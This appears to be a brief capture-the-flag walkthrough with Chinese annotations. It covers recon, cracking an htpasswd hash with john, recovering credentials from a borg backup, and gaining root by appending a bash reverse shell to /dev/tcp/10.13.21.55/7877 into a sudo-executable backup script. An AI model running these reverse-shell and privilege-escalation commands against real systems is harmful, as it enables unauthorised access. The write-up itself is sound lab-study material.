nmap -A 10.10.210.5
python3 dirsearch.py -u http://10.10.210.57/ -e all
/admin/
/etc/
/etc/
路徑開始看裡面有啥
passwd
檔案
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
john a.txt --wordlist=/opt/rockyou
music_archive
squidward
/admin/
borg list .
squidward
borg mount . ../a
alex:S3cretP@s3
sudo
執行 /etc/mp3backups/backup.sh
chmod +w
新增 Write 權限echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
nc -vlk 7877
sudo /etc/mp3backups/backup.sh